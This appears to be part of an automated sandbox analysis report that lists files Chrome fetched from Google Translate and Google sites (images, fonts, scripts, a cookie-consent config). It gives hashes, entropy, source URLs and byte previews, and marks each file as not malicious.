                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:................................................................................................................................................&.............................................................................................!...1.AQ".a...q2#...B.R$.....b.3.r%4...CSsc.5.......................!1..AQ.aq".......2..B#..r3..Rb.$....C..Ss.c4T%............?..........X.AY...../{...T.=..T....T.....T.u..........^x.A{Q>8*......T...z....i.T.....T.....T.u.<......U._p.....*kW..P^.<.PW{...P.....^..+u. ...,..K.X.*{.....g...g...p.` ... ... ...S-..../u.jW.....PQ]|..T..b..z.QQ.p..X..o.CH* e.2."K."..~..r.l..{...F./72.)..o..Ju..T...(*2..b..s{N...5...p....1'..3...u..[.a..e..2..I...JKI.d..m..Tt=s..._.....~...Q..OrY.m..;.....W~E.|..tS+~"y\.#j."E.....AQ SN...;..H<d.*.f.7....8..Mp.....l..Ri.........^....]R..+.r.5..C.V.Ms.p.p."I..TL.EO....)D&<.~..k...0:..T.^v{.0.0.)D...rW.k...<.}s.\.....k.\.....k.{.....L..@.y...$..'..(u.5.\].....JP..T.....,..C.y.......+.....9..\\..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):455
                                                                                                                                                                                                                                                            Entropy (8bit):5.219671835913123
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:k6El6qF5Us6ytxasD0I+DHhi0DIy1OypkbRNkN0:k6Pq7Us9txasH+15MykVrkK
                                                                                                                                                                                                                                                            MD5:8489813BEA041F1653F5EA476BCB5095
                                                                                                                                                                                                                                                            SHA1:D1628CC53060D34EF537FD70B140D10463DF4F7B
                                                                                                                                                                                                                                                            SHA-256:0564ADB926B9C06FF10096FDEBF4CEC88B24446109E7279D5F13BE4E22982469
                                                                                                                                                                                                                                                            SHA-512:AA2F69A0090A24CD1652478A9D6D9601175005EF78E7C24DAEDF7EDF1CC6034A59A8FF6DC8371325F7B5FE1BFBF3CE54512860B7659EA1C54A0CCD03774BBA20
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BSwBZd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HgVFRb,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rQ304,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=uD1GC"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("uD1GC");.var HS=function(a){_.jw.call(this,a.va)};_.C(HS,_.jw);HS.qa=_.jw.qa;HS.prototype.Hc=function(){return"uD1GC"};HS.prototype.Gd=function(){return!0};HS.prototype.Ic=function(){return _.ES};_.iw(_.isa,HS);_.Dv.uD1GC=_.Sz;._.p();.}catch(e){_._DumpException(e)}.}).call(this,this.default_TranslateWebserverUi);.// Google Inc..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 384x140, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):35763
                                                                                                                                                                                                                                                            Entropy (8bit):7.9764156761230085
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:SAFnRQGJ6onwwaPKa2FISR8wZ/3iILZRT5zgbg1PVuE2RKLEDI8JyeT5oI1B:SAdRPJ6oxaP54ISFtimZRTK8BoEyKADL
                                                                                                                                                                                                                                                            MD5:42C9A73661A353AD5192B06C50107113
                                                                                                                                                                                                                                                            SHA1:CED850074C740BD2955A7272A5FE17E48F97AF3C
                                                                                                                                                                                                                                                            SHA-256:EADE235F29AB89318D3ED69F97E26FCCC88C2BECD873C82A3C9299A26ED5AA65
                                                                                                                                                                                                                                                            SHA-512:AF04C8504317B40AF015A9E4EF529CB39E6DA451157E769BAC1DB283D11AD8C28C41EA9F07AE840A5A5869B0AD38D3C622078369C1708493572E7BCA7275B9F8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/2011/holi11-hp.jpg
                                                                                                                                                                                                                                                            Preview:............................................................................................................................................................................................................................................!...1.AQ"..a2.q..B#..R...br3..CSs$..c.4.u...6'7......................!..1A..Qa.q.."....2BR....br#......3C$..c.54............?........W..H.Lk..#i.<...S.k]..-%.U...u......a..n.wx....8q...k.b..h.\[..2.?<r.4...l..B.[u.Y.!k..-#Q...X.i0....(Xg..%....r;.).%\1..g..~...6..n....u..!..e.R......:........M...kKK.nn.........I_P..0F4.n.H..:... .c.....uw"...5<.h.....J.c.0......9......j..#.!#D..q..m.yd"4.K3u....1.6..@......M..+.9..5 .QSG...#....x....Q.8|;!.l..eGF.....z.#5..9}"%.kQ.0.....C....lt...@q..5..<A.FG.....q..223...6......~.....NB...j..8.W...\4..B...W.......`.f...y./..=e....0.....bG.eM!..-R....0.n..].......1%....L.F.q...:.<.....^.`V4...H.88.9..^..df222......FFT.##...#..df.zx..2<gT.T.}N5..F..q...,...t....V4.x..Ei..)*.z.(..O,p.......5^..-.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):194994
                                                                                                                                                                                                                                                            Entropy (8bit):7.9647903598937875
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:3ZdgiWbCp95yo5Ebk9cjZwHHg3f6rJeR5L8n3KqZz0jW2Sb38H4dHZTHhBF+Qw08:JdgUXH53cmHHkQJeR5LY3KqheI8Y7hBq
                                                                                                                                                                                                                                                            MD5:C4BF058F7E5B2AA86D5627EBC9721DAD
                                                                                                                                                                                                                                                            SHA1:51686599D5744A29B734934A5C87077895867920
                                                                                                                                                                                                                                                            SHA-256:DB3AEDBC0210E0734E727BA917335AAC605BA85DE987E622BA30C921FEC77A9D
                                                                                                                                                                                                                                                            SHA-512:6A728762D289049C1A3EDB983D17A07172F6D8A434B141588D5A9E01BBF9E8E6A1CD31B4E6FE961B89C9A7BA7C9D2A6C749E9960892C0340254D830ADE0607D9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2023/tunisia-national-day-2023-6753651837109852-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a..........Y...4.G..$......j.I...h"........d..1......(..q.....q..........{.......y.Y..R...|...(......*...........|....i..G..9..c..t...Q&Y.........q.....k.j...u......vT....*.....0..u......(.......r..1..:........9T.....b...m....0......E..mM.gf.y.......ePb...Y..K...qw....HPo...u...........<.....}.......P...+58..w...q.c..3...}..B[2....'O....q...Sp..!.......z.s...........|bu..E.....0.....-j.@.................u...m...a...f...1E.s.....}.m..7........{....Za....e>.~.t...^>...Kb.3........y............$......#;......L.._..9...[1..........y..........q...=....8X.........y..<....................4........+........|..?.............. ..r..!...u..a..............................................................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="h
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):254
                                                                                                                                                                                                                                                            Entropy (8bit):4.562407526298979
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:q1T3KHKgYBFpKnKyjqLBaEwVNvwCTXHSOK:qd3KqgYBTGyLp0LHtK
                                                                                                                                                                                                                                                            MD5:1A4BCE8258288DE0C72FAE22657C4551
                                                                                                                                                                                                                                                            SHA1:3729DF04CC25427F2E47F530FEBEB5BEE6EE9E75
                                                                                                                                                                                                                                                            SHA-256:7AB6D9009AB1E9694A90C6A6604B6D244457347C354C10156E41CC8133E9C8A8
                                                                                                                                                                                                                                                            SHA-512:27A17B0629E306C6E9CB2B1D1F3F1025A99EEFAB3B0B4949AED1AD48A1C5F0DD84D9F773F75B6C31D1A04F077E7E7D75C6DD0280250CCA2ADCAA349159684E0A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/intl/en/brandstudio/kato/cookie_choice_component/config.json
                                                                                                                                                                                                                                                            Preview:{. "mainText": "This site uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic.",. "moreText": "Learn more",. "moreUrl": "https://policies.google.com/technologies/cookies",. "consentText": "Ok, Got it".}.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6225
                                                                                                                                                                                                                                                            Entropy (8bit):5.976934819783072
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:+R2K3Z4n7tyVwip82hezk6227gLFoXhu1XuE20ot+pVY3YptWDzOzgXK3Zx:ql3KnxyGGMzb7noR20NTww33
                                                                                                                                                                                                                                                            MD5:2BD5C073A88B83ED74DB88282A56DDFB
                                                                                                                                                                                                                                                            SHA1:D0EBFC376F8C6A44A8D4CD216817DCD7D0C33650
                                                                                                                                                                                                                                                            SHA-256:AB5C23A05E39DEED14D9D8262B0DCE9F024F86105A27196CAD37D14A3F516E09
                                                                                                                                                                                                                                                            SHA-512:5C6C4A92E93FC0F6A675658CC84F6187FDEBD3EEE94EFD07E24658736CBA598F3BC7156B19834B13FB44C1D43FCB7DF9FCCA7F0A453037E30DA76BA8F4B23B89
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/i/productlogos/translate/v6/24px.svg
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><defs><path d="M21.5 5h-9.17L11 1H2.5C1.68 1 1 1.68 1 2.5v15c0 .83.68 1.5 1.5 1.5h9.17L13 23h8.5c.82 0 1.5-.68 1.5-1.5v-15c0-.83-.68-1.5-1.5-1.5z" id="a"/></defs><clipPath id="b"><use overflow="visible" xlink:href="#a"/></clipPath><g clip-path="url(#b)"><image height="31" opacity=".2" overflow="visible" transform="translate(3 1)" width="29" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB0AAAAfCAYAAAAbW8YEAAAACXBIWXMAAAsSAAALEgHS3X78AAAA GXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABQBJREFUeNq8V8tu20YUvXdm+LCk RKiMwI1TFEXhVZJd1gW66xekv9DPqPsvXdU/UaDroJskKy+CInCcGpKtFy2SM/f2DEXZia0odtKW AkFJ8zhzzn3S0Ycvps+79EMDbj3Yfgv4EM+XTN/fEOb3Zg3AXmq7j64D5/e/x/EfzZMnX5jx+LFZ LLyp6yNDOzskYb6RubFdpbdvKUl2Jc+d9PvP5dmzUyH6TVoYXQOq+H5g9vb+cONsO9maLpIyyZPU kZNAppmh9Vpg5kSXwCSVJ5/Vi/r8Tl73y2F9ePidJ3oaga+B4vkUgF+6EW1ndz11gvNdDdL1bDN
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 11036, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):11036
                                                                                                                                                                                                                                                            Entropy (8bit):7.978519013980623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:6IRtVqzG/1rS2T3Etx7CukLEA6rnWA4GrLZDaIJSMlBrtMZ5ul3R:6IRtVqzG/Vt6BCH4jrzBRJwmrtMZgpR
                                                                                                                                                                                                                                                            MD5:DACF33CF0C4656CF8FB58452FB3312BD
                                                                                                                                                                                                                                                            SHA1:4C18AFC3A3C86982CB04E209EB474CEBE7234B53
                                                                                                                                                                                                                                                            SHA-256:D3DC18396A0CC1338592FE51DD5F1E87F119BDB57D758379A5A4C7E33A21B9CC
                                                                                                                                                                                                                                                            SHA-512:9C3C6F2F38DFC8CC08D8AEC3C502EDDECEC2A5B24029CF4D2244575766E412B73F8B4E210A3379246178FEA88E0DE27395CCE98440751CB5518AFD885D96AEA3
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjAUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......+.......b...*..............................4..^?HVAR...`?STAT..'...|/<....X.I..@.0...6.$..|. ..>. ...5Y5l..7....=a.|d.D......-...&7d(..:W..&.ip.h......1C.$..-..z....N...yK.R.'...`.w.7.K....;^&.L......Lf....!...P...&gi..... .%.M.Q.']...7.6S/..d....7......kK..\K.X5..Y.D.z^....?.....iP..D. ...&7..\.I...U.^^.s{:...]K..t..U_.u|_.....i'7.$...K..+.PM".a.......D.c......BBD.&..H.T T..F.$....]..i..T@W m`]`......v.....Ce)lW.X.<..P..I2A......g..0.S..$.~+..t...(.;.. [O......:IM.....]-.G\..........x.L.....EL.y....K...C.....U.YPX.....}g_..os....r.@..._aZa.1....U-....]r#.pK^$.3...y.{.B.9.s..2~. ...Kp..S..*l..H...@0.q.u.I....J..s.M..]z.T.W.].....f.Mv..l.N..tk.j.:9..>....J.D.q.!1....[I.h.@.`D1F.P./1}.##.7n-.j..s.jZ....JT,...B.t.. h....d..`.....f..i.s.A.H0........-...../..E.)..qqp.....s.m|./..-............a..e...R;5Ydl.....%.e.u...-.._.........B..Ct .q.`..x.....j.i;.E^V.TM.z.......{.........R.\.zu.......k....%.4[..T........ ......2..:.`,.].u...s.rc..3
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 950 x 380
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):959644
                                                                                                                                                                                                                                                            Entropy (8bit):7.9283345880488225
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:WDhC8qxVOibS/1NZl4Wk6Ek3xPmyrBWfFk431OxFrNgGNb8xRqqXS1slekwHGqhN:ShIZbWpEkhPNqii1yfQUiS2lN6kk+u
                                                                                                                                                                                                                                                            MD5:2AD13BE7E919595F5A785D7569F20060
                                                                                                                                                                                                                                                            SHA1:72953CDE188A88C4E99B407AAF2FD6FB1647F5FC
                                                                                                                                                                                                                                                            SHA-256:F7FBA5B02119EB62F02411873790F512B4F754AA4FCF536FB8FF68B0911EF017
                                                                                                                                                                                                                                                            SHA-512:C4FD47B8F6EE0BCA773557528DE307767C4AB168F307AEE3D15D9B711363A12A2221EDB658AEB24050E2909030AE599C87C9B78E30D401BA563EF4454DBA5608
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a..|........7...N...'..i.Y...M.{2..B.G%..9.......w.......B$...v1.mO...u7".L.R...#.W .s(..1..8.c#.Y .vL.k'....C..D.T!..R.8..B.Y#.......e.....v.3.o.g#..g.5..t.e1.f..J..J.xC).U1..*..h..{.Y.R'.h.@..i..g.......Y..x&....c....s..Y0.F1.......J4.x4.v..r.B....U...z.....G..c;.s%.S9.h1.Y7.g5.Hf]R....U0..{...v7.8...........!..Q.l.R'..........J'....g....I..C..c..Y.i>.(....J1.P.............J..k2...Y5...zU-.J!....t.....R..k......t.....{....9..J.....c.....B..R..Z..s..J..k..Z..s..R..c../..1..1.{)..@..9..P..Z..Z.k)..J.k*.{!.c!..J.c).{!.s ..J..:.c!..K..J.....{..B..R.c)..R..B.k.....?.s*.s/..k..<..K.{......B..9.s!..R....\.k...Z..R.....c.....0..o..l....c..`.....o..A........)................J1..~.......yC7).......R...Z..k{xu..s......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):20226
                                                                                                                                                                                                                                                            Entropy (8bit):7.9889970744842165
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:LLt2tLM9wvD+jaNOG8f4LDDstt0t8+qfmZHa+ooXRS+ZBL7+uPc:LLwtUwvca84LDUb+q+ZxoohSaBPj0
                                                                                                                                                                                                                                                            MD5:8D34A2317BF5B31D7FEF1F5987B4C7A1
                                                                                                                                                                                                                                                            SHA1:35C942FF50F501B0C59E9057CB2997F7C4603E03
                                                                                                                                                                                                                                                            SHA-256:5C19D5D0F9F04C628ED9D8253F9AC046570F6745E815E585F4C292A3C9F5CBB7
                                                                                                                                                                                                                                                            SHA-512:FD87D4BC6E631DC04C27F92591D32EFD8D08AE48302303B4C27EAA4F83B005E32BADE5D7BE5B4091C99F891494EAAF59E836199626D6655E779085263150A9F0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:RIFF.N..WEBPVP8X........c..s..ALPH......D...V...d-.p.f.....4.Pg.Nl.,..'k....G..#.H.I.#y".kw.suF..u.....P.....8..h.m...%*..:...^.......2...Zd.+.@d<...+.Ld.+....nkc.i...;...wNv.\j r.. ....Xw_..%w.*B.P...|.M...@.C_. .4@...L..]...t.fj....i...C 1Pt...k..-.V.PQ;..`...8\Xp..iK..2..d.4......I.y..X}R...Ck9....N.-.....\.4.D...N.Zx7JfT...*..B.%..P..bN.Nc../....j..2..;/c......Q..1..:........:;-...:.IM.x7...(..S/ ..MP......=.;'...x0...l.i.*..5..@.O(.f.!.qrS.i"H...+.4d.-.,.xj'../#..k729........S.............b...l2.<..iO..f....kf.t,}9.@j.N...@.|....2..q..<..YS_...r`....q.....W,.=...u....sx......5.J....(.8...x..*...$e...!i...W..|.....d..,....Dlv..a..r..Apr<.......*.%z..Ikz|x4;=c=.,8>..........n..%.<..E.O.....C3.6.....B.D...<....xL......Z.p|.Jp4.....#..*.f.$......1........k;...{`..8..X.......&.d.<.PW......Rf.u.16.g..=<.#..Z/......p......|....`.l...|.........p2..z.....M..3.Rf.p3.'A......1.,.w3...r..3.....!f......}.....}..R!'..S.e....R.. .k^....oc#/.T.P..7
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1583)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):130004
                                                                                                                                                                                                                                                            Entropy (8bit):5.539488342920507
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:cCdVCZoOCpjRp34+fQ17Zk1+GlBtLfxX9zlQ5MFScE7FBVApMI20M3Vd6K:clmOCpNJ4+S7Zk1+GlBtLfxX9zlQ5MFY
                                                                                                                                                                                                                                                            MD5:419A1B6B2267880106542053492B1481
                                                                                                                                                                                                                                                            SHA1:F7AF5C95D1AE4526E187A56CF3918BCB90B2C79D
                                                                                                                                                                                                                                                            SHA-256:51E4BC020BC14A168B1ABD155D1DB2FAC48A6FF763BA1ADF46C8D77051731D94
                                                                                                                                                                                                                                                            SHA-512:65787299CC21F9CB3DF2B118E7836B91FE759756A7AF47611F561C982F9E399FE8F631ABAFE4728F9CA06BD842EAC3B6F2EBCF5859ED33D4BCDDC8F4EFDE1929
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.x3ks5OQMuEM.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin,qhlo,qhmn,qhpc,qhpr,qhsf,qhtt/d=1/ed=1/rs=AA2YrTsLMDC5ShDgua5PEfbsQVpNWEqjoQ"
                                                                                                                                                                                                                                                            Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Xj=function(a,b){_.Ca?a[_.Ca]&&(a[_.Ca]&=~b):void 0!==a.Qb&&(a.Qb&=~b)};_.Yj=function(a,b,c,d,e){let f=_.C(a,b,d);Array.isArray(f)||(f=_.gc);const g=_.Ea(f);g&1||_.Ga(f);if(e)g&2||_.Da(f,18),c&1||Object.freeze(f);else{e=!(c&2);const h=g&2;c&1||!h?e&&g&16&&!h&&_.Xj(f,16):(f=_.Ga(Array.prototype.slice.call(f)),_.ic(a,b,f,d))}return f};._.Zj=function(a,b,c,d,e){var f=!!(e&2);a.j||(a.j={});var g=a.j[c],h=_.Yj(a,c,3,void 0,f);if(!g){var l=h;g=[];f=!!(e&2);h=!!(_.Ea(l)&2);const A=l;!f&&h&&(l=Array.prototype.slice.call(l));var q=e|(h?2:0);e=h;let v=0;for(;v<l.length;v++){var p=l[v];var u=b;Array.isArray(p)?(_.Na(p,q),p=new u(p)):p=void 0;void 0!==p&&(e=e||!!(2&_.Ea(p.ua)),g.push(p))}a.j[c]=g;q=_.Ea(l);b=q|33;b=e?b&-9:b|8;q!=b&&(e=l,Object.isFrozen(e)&&(e=Array.prototype.slice.call(e)),_.Fa(e,b),l=e);A!==l&&_.ic(a,c,l);(f||1===d&&h)&&._.Da(g,18);1===d&&Object.freeze(g);return g}if(3===d)return g;f||((f=Object.isFrozen(g),1!==d||f)?
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15436, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):15436
                                                                                                                                                                                                                                                            Entropy (8bit):7.986311903040136
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:uJ/qNyGt74AcZEG+69hFFHDJ1CggakKt0y:+q/kAc+ohFx9YgB2y
                                                                                                                                                                                                                                                            MD5:037D830416495DEF72B7881024C14B7B
                                                                                                                                                                                                                                                            SHA1:619389190B3CAFAFB5DB94113990350ACC8A0278
                                                                                                                                                                                                                                                            SHA-256:1D5B7C64458F4AF91DCFEE0354BE47ADDE1F739B5ADED03A7AB6068A1BB6CA97
                                                                                                                                                                                                                                                            SHA-512:C8D2808945A9BF2E6AD36C7749313467FF390F195448C326C4D4D7A4A635A11E2DDF4D0779BE2DB274F1D1D9D022B1F837294F1E12C9F87E3EAC8A95CFD8872F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......<L.......|..;..........................d..z..J.`..L.H..<........e..^...x.6.$..6. ..~. ..).7{...K.. .k~....".v(...[...RE.$..K..C,.'..{BK.C&.....'L!...DZ........+6.r...K..._...<..0..].V..........e.r(RN.43k;g`...?<?.......b..c.`.. .6..p...5.$zd.R%.........h....";.^WU.....H........S.j..M:..=K..\B.6"f......z.........$...%w.?$-....9.:u....u.I..Tt..s........lY...J.6oN..y...1,I.Yx..lu..}.e...Og..d...Xv.. ...iF.]..x.N..#%,y.&..,*$.^.n...\.K.P.J.x...H$..-.....p.....t.v...gD^....?..6o......e....,f.)..h...P...<.:.E...X..p....U.?.[m....l.Y.S..p..%..K.,U..3U.qFZo.*...U...3..3.]\.C.#..9T.8P`8......P...R;..r..J.*...u.j..^vnf.v.... .pw...Z.(.6%$U.[.|....!mU\}./..i,..7D........:t'.a;.W(.."G....q.-.Z......;J..0.&/.5. .T......w..;...t...H.t.<y ..@xx .JA.U.t..;g....@..... .t......<.5(^.|s..Ko.O.x.....!...........lHF............So{.%..V...7..aA$....C;,"(.J..EE..@.....vOB.,V..../....B#.r+./-t.(.N.S...R.Z$4...4i.c.}t...#3`.......s..;.O,.|..W.A.f.w.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):15344
                                                                                                                                                                                                                                                            Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                                                                                            MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
